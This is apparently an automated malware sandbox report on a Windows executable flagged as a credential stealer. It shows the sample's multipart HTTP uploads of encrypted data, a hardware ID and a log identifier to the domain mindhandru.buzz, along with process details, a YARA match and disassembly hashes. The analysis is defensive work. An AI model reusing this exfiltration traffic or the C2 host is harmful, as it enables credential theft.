                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                  Content-Length: 584458
                                                                                                                                  Host: mindhandru.buzz
                                                                                                                                  2024-12-27 07:42:11 UTC15331OUTData Raw: 2d 2d 51 39 4c 58 45 55 56 4e 38 45 5a 57 35 39 4d 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 44 34 44 32 43 34 30 32 32 38 33 30 35 35 43 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 51 39 4c 58 45 55 56 4e 38 45 5a 57 35 39 4d 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 51 39 4c 58 45 55 56 4e 38 45 5a 57 35 39 4d 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63
                                                                                                                                  Data Ascii: --Q9LXEUVN8EZW59MCContent-Disposition: form-data; name="hwid"9D4D2C402283055CBEBA0C6A975F1733--Q9LXEUVN8EZW59MCContent-Disposition: form-data; name="pid"1--Q9LXEUVN8EZW59MCContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic
                                                                                                                                  2024-12-27 07:42:11 UTC15331OUTData Raw: aa f1 80 66 79 ac 1a ae 15 63 7a 1e ad 2a bd eb db 81 37 37 77 b5 27 b9 8d 20 2a ad 62 3b bb 7e 17 98 5a f3 fa df be a1 55 2d 2c ec 10 80 a3 6a 00 2a 37 ea 6e 05 11 30 5c 40 02 18 e1 5b 11 3d 10 89 a4 7d a1 cf 13 49 4c a5 b5 6d 07 2d 8c 84 ee dc 83 90 e3 04 f0 ac 9a 7e 03 b4 96 6e 4e 5d 56 05 9a f6 55 0d 04 31 a3 24 91 e9 1a 1e 26 15 c2 bc 58 cd 89 86 32 ff 28 8d 70 bb 5c 58 81 bc 52 eb e1 c5 41 a2 e6 e6 8a bf e6 53 03 c7 f9 06 d8 0d 33 a1 d6 0d 8f e3 da 8b b3 b1 b0 f6 a2 59 4e e1 de 84 b7 bb 69 ec f1 29 83 4a f1 c9 62 e9 15 5f 66 44 c6 6c 5d 6f 3c c7 e9 2e 57 2b 10 0c 42 85 c0 e5 d6 86 8c 9c 66 74 fb 73 b8 83 7b f8 20 78 e3 4c a4 cf 1a 04 cc fe d4 1d cc 9c a6 13 90 6e c2 7b bb d2 65 45 9a 65 e8 3c bd 4d f5 8e 0f 8f d2 72 12 18 4b 77 a5 7b a0 f6 01 ab 3f
                                                                                                                                  Data Ascii: fycz*77w' *b;~ZU-,j*7n0\@[=}ILm-~nN]VU1$&X2(p\XRAS3YNi)Jb_fDl]o<.W+Bfts{ xLn{eEe<MrKw{?
                                                                                                                                  2024-12-27 07:42:11 UTC15331OUTData Raw: 8b 6f 4c e5 9b b3 cc eb 9a d2 2e bd 1a 63 dd 1c 04 c2 4a 07 29 86 98 d4 07 17 e2 31 2c 81 ce a7 3f 96 65 13 1e 55 eb ff 01 2e 8e f8 5b 75 16 af 5e 47 6f 3e 2b 21 42 1b 78 f6 be 8f 76 89 9c f8 01 29 eb a0 b0 80 a8 b5 0f df ef 1c 0e fc 2c bf f2 3d 80 86 de d7 5f aa 20 51 b8 15 bf 57 3a 0c be 37 22 dd 1b 62 99 19 38 c9 6b b1 f6 2e c8 ec ef 04 d1 7a 3f 6a 8f fc f9 dd 0d ec d1 6e 46 4f 33 43 c9 6d b4 6f 8e cb 6b 6b 99 51 36 99 5d d6 bc b5 29 5c e5 e1 d5 1b 10 7b a5 d8 fb e6 77 30 d7 9d 18 34 a2 f8 dc 27 5c c7 bd 5e 6b a6 78 28 86 8b 39 cb b1 3f 79 ba d2 27 66 7f 8d 85 f7 01 cf 8e 88 63 36 6b 86 d6 e5 fd f8 29 99 91 6e cc f0 5e c9 87 b3 bf 97 57 ae cf 4c 3b 36 67 56 57 8d 9e e1 3a cb ec 76 ac 10 3e 7b ef 4e 27 87 c2 c1 e7 6b 1b af ef c6 b1 66 c6 9c 47 74 0c a7
                                                                                                                                  Data Ascii: oL.cJ)1,?eU.[u^Go>+!Bxv),=_ QW:7"b8k.z?jnFO3CmokkQ6])\{w04'\^kx(9?y'fc6k)n^WL;6gVW:v>{N'kfGt
                                                                                                                                  2024-12-27 07:42:11 UTC15331OUTData Raw: a6 b9 87 13 66 38 71 12 37 49 1f 41 92 b8 e4 33 21 52 78 c1 72 f4 7a ca ce d2 d3 97 9f 3d d8 a8 97 cf 8f c4 38 7c 57 0e ac 11 c4 eb f1 f0 e5 1a b5 9f 23 32 00 e8 a6 7c 22 30 a4 b1 13 a3 9e b4 41 2b f7 26 c6 76 de fc 92 40 87 7a 5b 47 7c 25 16 11 42 22 7d 6e 83 58 cb d5 cc bd 18 bc d0 a4 33 9b dc be f5 36 d8 68 d3 57 4a 49 af c0 23 b6 66 8d 51 f9 75 5c 46 df db bd 4a c5 62 65 f8 64 70 0d b3 d1 bd 49 4d fc 3d 02 4b 94 da f3 ec 90 08 19 e0 24 77 42 69 cf 5b 38 f1 6b f4 21 a7 35 21 aa 43 5b 11 9c 44 22 5a 59 cf 3a ea 6c 3d 38 7a 8a bd 08 12 c6 71 bf e4 2d 83 32 54 f6 93 7b 7a 23 0f 7e 30 cb 1d 4a 7e 4a 22 65 72 01 45 94 c4 13 50 28 29 a2 c1 d7 88 fd 72 d4 e3 63 93 08 70 45 c2 0f 37 eb e1 14 40 0e b6 b0 fb 6b 42 48 66 1a 87 98 12 90 d0 58 dd 89 bc cb 06 8a 55
                                                                                                                                  Data Ascii: f8q7IA3!Rxrz=8|W#2|"0A+&v@z[G|%B"}nX36hWJI#fQu\FJbedpIM=K$wBi[8k!5!C[D"ZY:l=8zq-2T{z#~0J~J"erEP()rcpE7@kBHfXU
                                                                                                                                  2024-12-27 07:42:11 UTC15331OUTData Raw: 18 e9 04 01 de 26 58 4a e9 e6 98 a7 f9 c1 fb 84 d3 7e 66 03 87 09 4d 61 4f 00 36 24 ad 83 ee 30 80 1c 26 ba ae 15 03 4c fa bd 41 ff 78 6d 5e f8 dd f3 2a 1f 16 f5 42 f5 d0 09 05 0f 66 f9 8e b8 b1 5f 47 e5 b8 55 0b b1 41 27 2d c9 d9 4a fa 29 f4 6c 97 d7 af 43 3f 3a 5c 12 0f 62 5f c7 ac f4 b0 b2 cc 66 69 d6 b4 20 f8 7a 3a fc 83 34 7a 9d 0a 4f 8e bc 97 bd 46 43 6d 0a ac 96 bd 26 ca 4d 3a f0 a2 52 88 4a 6f 62 ca 82 fc f4 8e 5b c3 0d 9c d2 5f 05 77 42 50 cb 51 f2 78 6c 2f 2f 87 e3 de bd 5f b4 3d 79 3b 29 a8 b1 ef f0 1d 79 9b 35 e5 5a 29 27 86 20 04 df 01 99 1c c6 8b c3 0e c3 bf 81 84 42 93 14 bf 41 78 de 5c 72 4f f6 5e ef 4e f6 d3 9b 11 0f 69 af 4b bf 2e 87 9d 91 29 75 82 15 46 90 2e ba e3 21 01 42 cb bc 20 72 0a fe a9 94 e5 73 85 60 21 58 19 f1 74 e9 f7 26 7a
                                                                                                                                  Data Ascii: &XJ~fMaO6$0&LAxm^*Bf_GUA'-J)lC?:\b_fi z:4zOFCm&M:RJob[_wBPQxl//_=y;)y5Z)' BAx\rO^NiK.)uF.!B rs`!Xt&z
                                                                                                                                  2024-12-27 07:42:11 UTC15331OUTData Raw: cb 3c c9 f8 11 48 a9 f8 08 8b b4 e0 ae 95 c6 92 59 96 c3 cb e6 ef cc 93 d0 78 54 98 16 2f 0e 97 a4 6c 2a 95 11 ae d7 c2 5a 7a e8 cb b0 62 c0 ea 3f cd 6e 04 34 25 1e dd 21 1c ab 49 49 92 67 e2 f9 4e 13 13 5b 7d b6 66 aa 17 fb 7a 8b e8 9c 32 d4 d4 1e c1 17 87 62 9d d1 91 6a b3 79 53 6e a2 c5 be 6c ef f3 4c cf 19 1a 00 b3 37 6f 0e b3 1f 78 bc 9f 73 b0 49 20 89 a8 5c 54 9d fc c1 5e 2f a6 3f 82 0d 11 a8 76 9a 69 4a 75 3a a7 57 dc 62 43 be d0 42 40 18 41 41 02 eb d0 72 5f 65 a8 da 2f d7 71 aa 14 26 c5 0a f5 7b f8 24 a7 56 14 25 f5 8b a0 1c 1d a3 c9 a2 78 f8 f0 20 f6 e7 8e 4c fe 78 3c b1 a9 21 d4 fd 5b 4c 14 25 74 31 c3 8b 45 4b f9 b8 0a 33 a0 95 85 a4 2e a3 dc 55 01 28 29 3b 31 d4 51 06 12 25 06 88 2e 8e 7c ee 2f 24 e5 a3 79 b5 9f a9 e2 cf 70 08 fb 2d f4 4b 2c
                                                                                                                                  Data Ascii: <HYxT/l*Zzb?n4%!IIgN[}fz2bjySnlL7oxsI \T^/?viJu:WbCB@AAr_e/q&{$V%x Lx<![L%t1EK3.U();1Q%.|/$yp-K,
                                                                                                                                  2024-12-27 07:42:11 UTC15331OUTData Raw: 7a 8c 01 4e 11 fd 01 24 e1 b9 bc 99 ab b7 80 ed 41 ab f6 ea 2d c4 a3 d7 34 d3 38 42 e7 d8 d4 77 3d cf 28 f9 24 9c d9 68 a6 22 97 17 71 b9 3e 46 e5 42 0d 8a e2 b3 ab 99 7b 2c c9 d4 3e 2c e0 d6 d5 14 67 be 65 ee fd db f9 c9 2a 08 d5 df 79 c4 a4 29 be c3 77 f8 84 ae db 60 0e da fe af 86 69 2d 25 5a f9 0e ff f9 09 dc 9a 27 5d 9b 37 b3 4b 4c 65 68 d6 b0 ef ac 1c 5b cd 22 f4 79 e4 13 17 9b 24 af f3 18 52 d8 ea d5 df 2f 63 a1 79 b0 04 d6 7a 11 f9 38 53 fd 0c 45 74 56 87 69 0f a0 2f 8b a7 5b 60 1a 35 94 20 c9 4d cf 56 15 54 50 c1 01 49 5a 1b 95 20 4b b4 ca cd 77 04 14 a7 6f 1c fa 7a 12 9c d9 61 fd 9b 80 2f 67 5e 76 81 d2 05 98 3b fe a8 83 91 2f bd 48 13 db ad ba 86 69 fb 0c fa 8f 69 6a 68 f0 a5 7f 37 17 06 a6 5a e8 5f 46 98 f4 94 2f 54 79 f2 d2 88 d1 53 6a 85 12
                                                                                                                                  Data Ascii: zN$A-48Bw=($h"q>FB{,>,ge*y)w`i-%Z']7KLeh["y$R/cyz8SEtVi/[`5 MVTPIZ Kwoza/g^v;/Hiijh7Z_F/TySj
                                                                                                                                  2024-12-27 07:42:11 UTC15331OUTData Raw: 1e fb 59 9e 17 28 a0 25 4b b0 7f f9 ee 11 18 d1 db 46 0b 14 18 21 3d bf 50 34 5b 05 09 f9 d6 51 41 21 30 e8 92 6d c1 53 31 9a 4b fe cb 3b a0 40 19 93 e4 cf bf 09 40 89 44 c3 87 ff fe 93 b7 3f 1f 5d c9 73 88 82 b0 5d 47 5b 75 b9 2f 55 b1 82 18 18 b7 ec 9d 37 55 a1 79 ce 50 be 03 aa 3b 26 3d d6 99 72 53 ad b6 dc 81 d2 23 9b 84 78 60 b0 85 de af af d9 18 c5 c3 71 30 2f 0b d2 4b 51 19 e7 70 8d 19 a2 c7 dd 97 28 19 86 38 58 dd 06 40 b4 52 ef d9 03 5b 39 ee ef 10 49 b0 3a 85 e5 bb 63 44 62 d3 43 e0 ac ae fd a4 83 fc 57 b7 63 46 33 41 47 9b f0 c5 44 74 9f 15 dd ee a7 92 67 66 43 4a 54 a0 18 e7 b6 63 81 8b 3a ae db 21 32 0a 32 64 b6 5b 52 ac 17 6a 49 d3 27 c0 49 b1 f5 9f 26 ff 22 7e a9 21 4f e7 e1 61 11 f5 e7 d4 94 76 9f c5 bb 9f 10 bf aa 74 7c b9 c9 a3 0e 5f 81
                                                                                                                                  Data Ascii: Y(%KF!=P4[QA!0mS1K;@@D?]s]G[u/U7UyP;&=rS#x`q0/KQp(8X@R[9I:cDbCWcF3AGDtgfCJTc:!22d[RjI'I&"~!Oavt|_
                                                                                                                                  2024-12-27 07:42:11 UTC15331OUTData Raw: f2 04 af 0f 31 4e 30 67 90 e7 d6 50 11 52 22 77 d4 48 49 62 32 d6 f8 a3 3b 3c 61 95 5b bf 12 93 09 af bb 88 1d c7 5f 77 87 c7 c7 9b 26 23 56 61 e0 0e 3f 86 92 d6 26 d4 60 12 b7 3e 60 8e 85 13 e2 58 e2 60 dc e5 3a c3 d1 fa b7 92 1f 4b 0c 19 70 8f 73 0e 09 95 0a eb 37 84 8c 11 2d 6e e8 e6 79 20 48 8f 84 97 46 22 a0 81 75 eb 17 ca 53 e0 9a 70 6f 17 a3 42 3d b9 9e df 9e 87 1a f9 39 3c 71 e7 a2 36 99 b3 06 f3 77 8d 88 14 6b 38 50 a0 96 9e d9 65 a3 a2 9c 12 ce 33 21 f4 89 22 01 ec 47 84 ad f5 71 3f 3e dc 75 aa 3b e2 96 9a 36 a0 9f 0e cd 87 2f 61 7e c9 f0 df aa cc 97 8a c4 6e de ee ca 5f 2c f2 aa d9 34 9e 02 dd 69 1f bf b5 83 f9 bd 29 b0 ad ef 69 d1 aa 89 e9 be 26 ce 69 4c 7b 1f d6 40 82 d3 82 f5 63 c7 b7 ca 48 f2 90 bc d9 55 f7 e5 68 a3 84 47 71 35 03 8b af 9e
                                                                                                                                  Data Ascii: 1N0gPR"wHIb2;<a[_w&#Va?&`>`X`:Kps7-ny HF"uSpoB=9<q6wk8Pe3!"Gq?>u;6/a~n_,4i)i&iL{@cHUhGq5
                                                                                                                                  2024-12-27 07:42:11 UTC15331OUTData Raw: 7d f5 ae 1d 4c 49 4a ea 8a 8a 2e 3c db 2d f9 9f 3d 9c a3 65 53 a5 a4 40 17 90 e1 c7 7c 32 2a 7a a7 a3 67 3b 6d 52 84 61 ea 6e c9 6d c4 6e da 48 9b 26 a5 1c 25 bf 26 0f 16 a2 60 9a 7f 4d 7f b3 d1 06 29 35 84 a3 d2 5c be 7a 62 cc 69 f3 20 c4 8b b3 a9 9b ff 61 22 35 69 4d 1a e5 73 d3 33 b2 c0 89 3a e7 38 fb 4e ea 61 91 3f 2b 9d 79 66 70 f1 d0 e7 cb 6b 27 ae f7 97 3b fb 4c cd 1d e8 79 e7 ec 1d 1f b2 c9 d1 2c d5 55 d4 6b 2e ff cb b4 eb ab 8b ad 98 dc cf 59 41 7d 9e f8 91 17 1c d6 ef b9 d6 af db d7 f9 60 47 70 da f4 40 e8 ef 53 79 6d 7d e7 ad d3 66 07 c2 d7 7b 67 67 dc 2a 86 07 82 47 4b 67 d3 dc 5a 7c 68 2b d6 2d 56 3b bb 06 ed a3 bb e7 7a bd 2a db 44 c1 f5 19 24 a8 e0 ac 4f 5d 9f e9 f9 34 7b 73 c7 53 aa af a4 c6 14 8f 92 4d c9 44 9c e6 51 4e e6 e0 45 32 19 c1
                                                                                                                                  Data Ascii: }LIJ.<-=eS@|2*zg;mRanmnH&%&`M)5\zbi a"5iMs3:8Na?+yfpk';Ly,Uk.YA}`Gp@Sym}f{gg*GKgZ|h+-V;z*D$O]4{sSMDQNE2
                                                                                                                                  2024-12-27 07:42:14 UTC1135INHTTP/1.1 200 OK
                                                                                                                                  Date: Fri, 27 Dec 2024 07:42:14 GMT
                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Connection: close
                                                                                                                                  Set-Cookie: PHPSESSID=40t7at7pib1made6nsiac9thhe; expires=Tue, 22 Apr 2025 01:28:52 GMT; Max-Age=9999999; path=/
                                                                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                  Pragma: no-cache
                                                                                                                                  X-Frame-Options: DENY
                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                  vary: accept-encoding
                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XSv2aIv8fgUvdNYUW0Ysbu3rjs%2B%2FAo3vpdM8x%2FnbHCF6owmNLC3zh97vFpc0VUV%2F8D3w1KoYeeU02AfCwt9LjccFjGUc3eRCTOqoeKF06qZdrRi%2BJKm2OeGQ8FBDdR8COSo%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                  Server: cloudflare
                                                                                                                                  CF-RAY: 8f87ac2848ec42e7-EWR
                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1987&min_rtt=1982&rtt_var=754&sent=331&recv=614&lost=0&retrans=0&sent_bytes=2836&recv_bytes=587046&delivery_rate=1441975&cwnd=241&unsent_bytes=0&cid=c6fc61e221ed1848&ts=3832&x=0"


                                                                                                                                  Statistics

                                                                                                                                  CPU Usage

                                                                                                                                  Click to jump to process

                                                                                                                                  Memory Usage

                                                                                                                                  Click to jump to process

                                                                                                                                  High Level Behavior Distribution

                                                                                                                                  Click to dive into process behavior distribution

                                                                                                                                  System Behavior

                                                                                                                                  General

                                                                                                                                  Target ID:0
                                                                                                                                  Start time:02:41:45
                                                                                                                                  Start date:27/12/2024
                                                                                                                                  Path:C:\Users\user\Desktop\zi042476Iv.exe
                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                  Commandline:"C:\Users\user\Desktop\zi042476Iv.exe"
                                                                                                                                  Imagebase:0x160000
                                                                                                                                  File size:2'941'952 bytes
                                                                                                                                  MD5 hash:E5C73B43BD01BB3580AF440576A00AD3
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Yara matches:
                                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1529546451.00000000012FB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                  Reputation:low
                                                                                                                                  Has exited:true

                                                                                                                                  Disassembly

                                                                                                                                  Reset < >

                                                                                                                                    Non-executed Functions

                                                                                                                                    Function 013769BD Relevance: 1.5, Strings: 1, Instructions: 201COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000003.1617123572.000000000136F000.00000004.00000020.00020000.00000000.sdmp, Offset: 0136F000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_3_136f000_zi042476Iv.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: i
                                                                                                                                    • API String ID: 0-3865851505
                                                                                                                                    • Opcode ID: 1d2680476f7066c1844bec7c8aa08bed72d0824c404dc1dcbc35a819abc5e769
                                                                                                                                    • Instruction ID: 1c3f4731bde33c3f13227261313fb8723d19acda2f41a78394b2d98ac1dcbd76
                                                                                                                                    • Opcode Fuzzy Hash: 1d2680476f7066c1844bec7c8aa08bed72d0824c404dc1dcbc35a819abc5e769
                                                                                                                                    • Instruction Fuzzy Hash: C74100A241E3C08FD3438B7089616813FB1AF13618B1E44EBC4C1CF4B3E269991AD722